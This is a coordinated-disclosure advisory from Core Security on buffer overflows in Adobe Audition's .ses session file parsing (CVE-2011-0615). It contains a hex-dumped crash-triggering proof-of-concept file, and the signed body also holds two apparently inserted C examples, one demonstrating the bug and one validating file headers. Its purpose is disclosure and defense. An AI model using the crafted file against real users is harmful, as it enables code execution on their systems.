Core Security Technologies Advisory 2011.0204
Posted May 12, 2011
Authored by Core Security Technologies, Diego Juarez, Eduardo Koch, Laura Balian | Site coresecurity.com

Core Security Technologies Advisory - Adobe Audition is vulnerable to numerous buffer overflows while parsing several fields inside the TRKM chunk on session (.ses) files. Then, a memory corruption can be leveraged to execute arbitrary code on vulnerable systems by enticing users to open specially crafted session files.

tags | exploit, overflow, arbitrary
advisories | CVE-2011-0615
MD5 | 7b91488b5d62aa1fd73cf0106c145262

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Core Security Technologies - Corelabs Advisory
http://corelabs.coresecurity.com/

Adobe Audition vulnerability processing malformed session file



1. *Advisory Information*

Title: Adobe Audition vulnerability processing malformed session file
Advisory ID: CORE-2011-0204
Advisory URL:
http://www.coresecurity.com/content/Adobe-Audition-malformed-SES-file
Date published: 2011-05-12
Date of last update: 2011-05-12
Vendors contacted: Adobe
Release mode: Coordinated release



2. *Vulnerability Information*

Class: Buffer Overflow [CWE-119]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-0615



3. *Vulnerability Description*

Adobe Audition is digital audio workstation software for Windows that
was originally developed by Syntrillium as Cool Edit Pro and acquired
by Adobe in 2003. The software lets users mix and edit multitrack audio
and stores multitrack projects in its own session file format (.ses).

Adobe Audition is vulnerable to numerous buffer overflows while parsing
several fields inside the TRKM chunk of session (.ses) files. The
resulting memory corruption can be leveraged to execute arbitrary code
on vulnerable systems by enticing users to open specially crafted
session files.

This vulnerability could be used by a remote attacker to execute
arbitrary code with the privileges of the user that opened the malicious
file.


4. *Vulnerable packages*

. Adobe Audition 3.0.1.
. Older versions are probably affected too, but they were not checked.


5. *Non-vulnerable packages*

. Adobe Audition CS5.5.


6. *Vendor Information, Solutions and Workarounds*

Adobe strongly recommends Audition users discontinue use of the Adobe
Session (.ses) file format and switch to use of the XML session format.
With the release of Audition CS5.5, the binary Audition Session (.ses)
file format is no longer supported.


7. *Credits*

These vulnerabilities were discovered by Diego Juarez, Eduardo Koch and
Laura Balian from Core Security Technologies. Additional research,
exploitability analysis and PoC were made by Diego Juarez from Core
Exploit Writers Team.


8. *Technical Description / Proof of Concept Code*

Adobe Audition is vulnerable to numerous buffer overflows while parsing
several fields inside the 'TRKM' chunk of session (.ses) files.

The vulnerability comes from passing a wrongly computed maximum buffer
size to the function found at address 0x483F065A. This function has a
prototype similar to this:

/-----
unsigned int 483F065A(wchar_t *dest, unsigned int size, wchar_t *src);
-----/
The 'size' parameter is expected to be a count of WCHARs, but (while
parsing session files) the caller passes a size expressed in bytes.
Since a WCHAR is two bytes, the callee may write up to twice as much
data as the destination holds, leading to multiple buffer overflows in
several fields of the 'TRKM' chunk of the session file.
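The unit mismatch described above, shown as an added example (this is not the vendor's code and not from the advisory): `bounded_wcscpy` is a hypothetical stand-in for the bounded copy routine whose contract is "size is in WCHARs", and `copy_into_field` plays the role of the parser, once passing `sizeof(field)` (bytes, the bug) and once passing the element count (the fix). The field sits inside a larger canary-filled array so the overrun is observable without undefined behaviour; the 40-character name is a constructed input, not data from the PoC file.

```c
#include <stddef.h>
#include <stdio.h>
#include <wchar.h>

/* Hypothetical stand-in for the bounded wide-string copy the advisory
 * describes: 'size' is the capacity of 'dest' in WCHARs, including room
 * for the terminator. Returns the number of characters copied. */
size_t bounded_wcscpy(wchar_t *dest, size_t size, const wchar_t *src)
{
    size_t n = 0;
    if (size == 0)
        return 0;
    while (n + 1 < size && src[n] != L'\0') {
        dest[n] = src[n];
        n++;
    }
    dest[n] = L'\0';
    return n;
}

#define FIELD_WCHARS   16   /* logical size of a constructed string field */
#define BACKING_WCHARS 80   /* extra room so a spill is observable, not UB */

/* Copies 'src' into a FIELD_WCHARS-wide field at the start of a larger
 * canary-filled backing array. Returns 1 if the copy stayed inside the
 * field, 0 if it spilled past it. 'pass_bytes' selects the caller's
 * behaviour: 1 = pass sizeof(field) in bytes (the advisory's bug),
 * 0 = pass the element count (the correct unit). */
int copy_into_field(int pass_bytes, const wchar_t *src)
{
    wchar_t backing[BACKING_WCHARS];
    size_t size = pass_bytes ? FIELD_WCHARS * sizeof(wchar_t) : FIELD_WCHARS;
    size_t i;

    wmemset(backing, L'#', BACKING_WCHARS);      /* canary past the field */
    bounded_wcscpy(backing, size, src);

    for (i = FIELD_WCHARS; i < BACKING_WCHARS; i++)
        if (backing[i] != L'#')
            return 0;   /* canary clobbered: the field overflowed */
    return 1;
}

/* Constructed input: a 40-character name, longer than the 16-WCHAR field. */
const wchar_t CONSTRUCTED_NAME[] =
    L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

/* Scratch destination used to exercise bounded_wcscpy directly. */
wchar_t scratch[8];

int main(void)
{
    printf("size passed in bytes  -> field intact: %d\n",
           copy_into_field(1, CONSTRUCTED_NAME));   /* prints 0 */
    printf("size passed in WCHARs -> field intact: %d\n",
           copy_into_field(0, CONSTRUCTED_NAME));   /* prints 1 */
    return 0;
}
```

The fix is entirely on the caller's side: the capacity handed to a routine that counts WCHARs must be `sizeof(field) / sizeof(field[0])`, never `sizeof(field)`. Compiling parsers with warnings for implicit size conversions does not catch this, so the contract of every bounded-copy helper should be documented in its unit and checked at each call site.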


8.1. *Proof of Concept*

The following (dumped) .ses file should trigger the vulnerability.

/-----

00000000: 43 4F 4F 4C-4E 45 53 53-D5 01 00 00-54 52 4B 4D COOLNESS+? TRKM
00000010: 48 A3 00 00-01 00 00 00-07 00 00 00-02 00 00 00 Hú ? ? ?
00000020: 0B 00 00 00-41 00 75 00-64 00 69 00-6F 00 54 00 ? A u d i o T
00000030: 72 00 61 00-63 00 6B 00-00 00 1E A3-00 00 10 27 r a c k ?ú ?'
00000040: 00 00 07 00-00 00 4D 00-61 00 73 00-74 00 65 00 ? M a s t e
00000050: 72 00 00 00-00 00 00 00-00 00 00 00-00 00 30 00 r 0
00000060: 01 00 00 00-00 00 01 00-00 00 00 00-01 00 00 00 ? ? ?
00000070: 20 4E 00 00-01 00 00 00-20 00 00 00-40 1F 00 00 N ? @?
00000080: 02 00 00 00-1B 00 00 00-41 00 75 00-64 00 69 00 ? ? A u d i
00000090: 74 00 69 00-6F 00 6E 00-20 00 33 00-2E 00 30 00 t i o n 3 . 0
000000A0: 20 00 57 00-69 00 6E 00-64 00 6F 00-77 00 73 00 W i n d o w s
000000B0: 20 00 53 00-6F 00 75 00-6E 00 64 00-00 00 05 00 S o u n d ?
000000C0: 00 00 0C 00-00 00 41 00-75 00 64 00-69 00 6F 00 ? A u d i o
000000D0: 20 00 49 00-6E 00 70 00-75 00 74 00-00 00 1B 00 I n p u t ?
000000E0: 00 00 41 00-75 00 64 00-69 00 74 00-69 00 6F 00 A u d i t i o
000000F0: 6E 00 20 00-33 00 2E 00-30 00 20 00-57 00 69 00 n 3 . 0 W i
00000100: 6E 00 64 00-6F 00 77 00-73 00 20 00-53 00 6F 00 n d o w s S o
00000110: 75 00 6E 00-64 00 00 00-FF FF FF FF-0D 00 00 00 u n d ?
00000120: 41 00 75 00-64 00 69 00-6F 00 20 00-4F 00 75 00 A u d i o O u
00000130: 74 00 70 00-75 00 74 00-00 00 00 00-00 00 01 00 t p u t ?
00000140: 00 00 00 00-00 00 00 00-00 00 00 00-00 00 40 00 @
00000150: 00 00 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAA
00000160: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
00000170: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
00000180: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
00000190: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
000001A0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
000001B0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
000001C0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
000001D0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA
000001E0: 41 - - - A

-----/
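A triage check for the dumped file, added here as an example (not part of the advisory and not Adobe's parser). The container layout is assumed from the dump only, not from a specification: an 8-byte "COOLNESS" magic, a 4-byte little-endian payload length (0x1D5 = 469, which is exactly the 481-byte file minus the 12-byte header), then chunks of a 4-byte ID plus a 4-byte little-endian length. Under that reading the first 'TRKM' chunk declares 0xA348 = 41800 bytes while only 461 remain, which a defender can flag before any field inside the chunk is parsed. `POC_HDR` is the first 20 bytes of the dump; `BENIGN_HDR` is a constructed well-formed counterpart.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum ses_verdict {
    SES_OK = 0,
    SES_TOO_SHORT,        /* fewer than 20 bytes: magic + length + one chunk header */
    SES_BAD_MAGIC,        /* does not start with "COOLNESS" */
    SES_BAD_FILE_LEN,     /* declared payload length != file size - 12 */
    SES_CHUNK_OVERSIZED   /* first chunk claims more bytes than the file holds */
};

static uint32_t rd_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Assumed layout (inferred from the dump): "COOLNESS", LE32 payload length
 * (file size minus 12), then chunks of 4-byte ID + LE32 length.
 * 'hdr' holds at least the first 20 bytes, 'file_len' is the real size on
 * disk; if non-NULL, *chunk_len receives the first chunk's declared length. */
enum ses_verdict check_ses_header(const unsigned char *hdr, size_t hdr_len,
                                  size_t file_len, uint32_t *chunk_len)
{
    uint32_t payload, clen;

    if (hdr_len < 20 || file_len < 20)
        return SES_TOO_SHORT;
    if (memcmp(hdr, "COOLNESS", 8) != 0)
        return SES_BAD_MAGIC;
    payload = rd_le32(hdr + 8);
    if ((size_t)payload != file_len - 12)
        return SES_BAD_FILE_LEN;
    clen = rd_le32(hdr + 16);
    if (chunk_len)
        *chunk_len = clen;
    if ((size_t)clen > file_len - 20)      /* chunk body cannot fit in the file */
        return SES_CHUNK_OVERSIZED;
    return SES_OK;
}

/* First 20 bytes of the advisory's PoC dump; the file on disk is 0x1E1 = 481 bytes. */
const unsigned char POC_HDR[20] = {
    0x43,0x4F,0x4F,0x4C,0x4E,0x45,0x53,0x53,  /* "COOLNESS" */
    0xD5,0x01,0x00,0x00,                      /* 0x1D5 = 469 = 481 - 12 */
    0x54,0x52,0x4B,0x4D,                      /* "TRKM" */
    0x48,0xA3,0x00,0x00                       /* 0xA348 = 41800 */
};
const size_t POC_FILE_LEN = 481;

/* Constructed well-formed counterpart: one 4-byte TRKM chunk, 24 bytes total. */
const unsigned char BENIGN_HDR[24] = {
    'C','O','O','L','N','E','S','S',
    0x0C,0x00,0x00,0x00,   /* 12 = 24 - 12 */
    'T','R','K','M',
    0x04,0x00,0x00,0x00,   /* chunk length 4 */
    0x00,0x00,0x00,0x00
};

int main(void)
{
    uint32_t clen = 0;
    enum ses_verdict v = check_ses_header(POC_HDR, sizeof(POC_HDR), POC_FILE_LEN, &clen);
    printf("PoC: verdict %d, first chunk declares %u bytes of %zu available\n",
           (int)v, (unsigned)clen, POC_FILE_LEN - 20);
    v = check_ses_header(BENIGN_HDR, sizeof(BENIGN_HDR), sizeof(BENIGN_HDR), &clen);
    printf("benign: verdict %d, first chunk declares %u bytes\n", (int)v, (unsigned)clen);
    return 0;
}
```

A check of this kind belongs at the file-ingestion boundary (mail gateway, upload scanner, or the parser's own prologue): a chunk length that exceeds the bytes actually present is malformed regardless of which field later overflows, and rejecting it costs one comparison.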



9. *Report Timeline*

. 2011-02-03:
Core Advisories Team notifies Adobe PSIRT of several crashes in Adobe
Audition and asks for technical assistance in order to determine whether
these crashes can result in a security vulnerability.

. 2011-02-03:
Vendor acknowledges receipt of the last email and notifies that the
Adobe tracking number 850 was opened to track this issue.

. 2011-02-24:
Core notifies that there has been no communication in the last 3 weeks
and asks for a status update about the reported crashes.

. 2011-02-28:
Adobe PSIRT notifies that the file format affected by the issue will no
longer be supported with the next release of Audition, planned for May
2011. Vendor also notifies their plan to publish a Security Bulletin,
including an acknowledgement for this report.

. 2011-03-09:
Core notifies that the impact of these bugs is not clear and requests
technical information to understand the nature and root cause of the
reported crashes rather than purely information about Adobe release
decisions. Core also asks Adobe to clarify whether this bug is considered
exploitable and whether patches or fixes are going to be released as well.

. 2011-03-16:
Core asks for a status update.

. 2011-03-16:
PSIRT notifies that they have not done any analysis to determine if this
issue is exploitable because:

1. The .ses file format is an older format that will not be supported
with the next release.
2. The .ses files store information about a recording session; they
are not typically exchanged between parties over email, and are even
less likely to be accepted and opened from non-trusted sources.
3. Adobe has been encouraging people to use XML files in place of the
binary .ses file format for the last year [1].
4. The installed base for Audition is small compared with
higher-profile Adobe products.

For the above-mentioned reasons, the vendor considers that it is not a
high priority to perform a vulnerability analysis. Vendor also notifies
that they are currently planning to publish a Security Bulletin in May
2011 with the release of the next major version of Audition.

. 2011-04-04:
Core notifies that additional research was done by Diego Juarez and the
reported flaws seem to be exploitable. Core notifies the advisory will
be released when these Adobe patches become available.

. 2011-04-04:
Vendor notifies that the Adobe ID 897 was opened to track this case and
they are on track for releasing patches in May.

. 2011-04-28:
Core notifies that the advisory publication was rescheduled to May 10th
and requests confirmation for a coordinated release. Core also requests
further information regarding the affected and patched version numbers.

. 2011-05-05:
Vendor notifies that these issues should be resolved in the upcoming
release of Adobe Audition planned for May 10th.

. 2011-05-06:
Vendor notifies that due to a last minute change, the release was
tentatively rescheduled for May 12th.

. 2011-05-06:
Core reschedules advisory publication for May 12th.

. 2011-05-12:
Advisory CORE-2011-0204 is published.



10. *References*

[1] http://blogs.adobe.com/insidesound/2010/03/audition_xml_session_format.html



11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://corelabs.coresecurity.com.


12. *About Core Security Technologies*

Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and prove real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.


13. *Disclaimer*

The contents of this advisory are copyright (c) 2011 Core Security
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAk3MJSwACgkQyNibggitWa0eXQCdHKHspwXyJu8ZwHyf2sFlOrfg
6YwAn0Pf2/bZJ80H2C2IfO0fG9BpvP4d
=EybH
-----END PGP SIGNATURE-----